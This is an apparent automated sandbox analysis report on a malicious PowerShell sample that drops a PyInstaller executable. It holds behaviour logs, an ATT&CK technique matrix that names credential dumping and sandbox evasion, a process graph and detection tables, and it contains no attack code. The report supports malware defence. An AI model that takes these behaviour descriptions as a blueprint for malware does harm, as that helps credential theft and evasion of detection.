Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\_queue.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md.cp313-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\unicodedata.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\certifi VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8ED010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF61E8ED010
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E905C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,4_2_00007FF61E905C00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD618C0 PyModule_Create2,getenv,RtlGetVersion,GetSystemInfo,InitializeCriticalSection,PyModule_GetState,PyErr_NewException,_Py_Dealloc,PyErr_NewException,PyModule_AddObject,PyErr_NewException,PyModule_AddObject,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,16_2_00007FFB9DD618C0

Stealing of Sensitive Information

barindex
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.pyJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
OS Credential Dumping2
System Time Discovery
Remote Services1
Archive Collected Data
12
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
1
Windows Service
1
Access Token Manipulation
1
Obfuscated Files or Information
LSASS Memory1
System Service Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
1
Registry Run Keys / Startup Folder
1
Windows Service
11
Software Packing
Security Account Manager4
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts2
Service Execution
1
Bootkit
11
Process Injection
1
Timestomp
NTDS47
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell
Network Logon Script1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
LSA Secrets1
Network Share Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Masquerading
Cached Domain Credentials141
Security Software Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
Virtualization/Sandbox Evasion
DCSync141
Virtualization/Sandbox Evasion
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation
Proc Filesystem2
Process Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection
/etc/passwd and /etc/shadow1
Application Window Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Bootkit
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571746 Sample: download.ps1 Startdate: 09/12/2024 Architecture: WINDOWS Score: 68 95 nodejs.org 2->95 99 AI detected suspicious sample 2->99 10 powershell.exe 1 32 2->10         started        14 check.exe 153 2->14         started        16 check.exe 153 2->16         started        signatures3 process4 file5 77 C:\Users\user\AppData\Roaming\...\check.exe, PE32+ 10->77 dropped 107 Found suspicious powershell code related to unpacking or dynamic code loading 10->107 109 Loading BitLocker PowerShell Module 10->109 111 Powershell drops PE file 10->111 18 check.exe 153 10->18         started        22 conhost.exe 10->22         started        79 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 14->79 dropped 81 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 14->81 dropped 83 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 14->83 dropped 91 57 other files (none is malicious) 14->91 dropped 24 check.exe 14->24         started        85 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 16->85 dropped 87 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 16->87 dropped 89 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 16->89 dropped 93 57 other files (none is malicious) 16->93 dropped 26 check.exe 16->26         started        signatures6 process7 file8 69 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 18->69 dropped 71 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 18->71 dropped 73 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 18->73 dropped 75 57 other files (none is malicious) 18->75 dropped 101 Contains functionality to infect the boot sector 18->101 28 check.exe 18->28         started        103 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 22->103 32 cmd.exe 24->32         started        34 systeminfo.exe 24->34         started        36 WerFault.exe 24->36         started        105 Opens network shares 26->105 38 cmd.exe 26->38         started        40 systeminfo.exe 26->40         started        42 WerFault.exe 26->42         started        signatures9 process10 dnsIp11 97 nodejs.org 104.20.22.46, 443, 49712, 49718 CLOUDFLARENETUS United States 28->97 115 Opens network shares 28->115 44 systeminfo.exe 2 1 28->44         started        47 cmd.exe 1 28->47         started        49 WerFault.exe 28->49         started        51 conhost.exe 32->51         started        53 WMIC.exe 32->53         started        55 conhost.exe 34->55         started        57 conhost.exe 38->57         started        59 WMIC.exe 38->59         started        61 conhost.exe 40->61         started        signatures12 process13 signatures14 113 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 44->113 63 conhost.exe 44->63         started        65 WMIC.exe 1 47->65         started        67 conhost.exe 47->67         started        process15

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps18%ReversingLabsScript-PowerShell.Trojan.Powdow
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Core.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5DBus.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Gui.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Network.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Qml.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5QmlModels.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Quick.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Svg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5WebSockets.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Widgets.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\VCRUNTIME140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\d3dcompiler_47.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\opengl32sw.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qgif.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qicns.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qico.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qjpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qsvg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtga.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qtiff.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwbmp.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qwebp.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qminimal.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qoffscreen.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwebgl.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwindows.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtCore.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtGui.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtWidgets.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\sip.cp313-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\VCRUNTIME140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_queue.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\_wmi.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md.cp313-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md__mypyc.cp313-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\libcrypto-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\libffi-8.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\libssl-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\psutil\_psutil_windows.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\python3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\python313.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\select.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI32762\unicodedata.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\MSVCP140.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
nodejs.org
104.20.22.46
truefalse
    NameSourceMaliciousAntivirus DetectionReputation
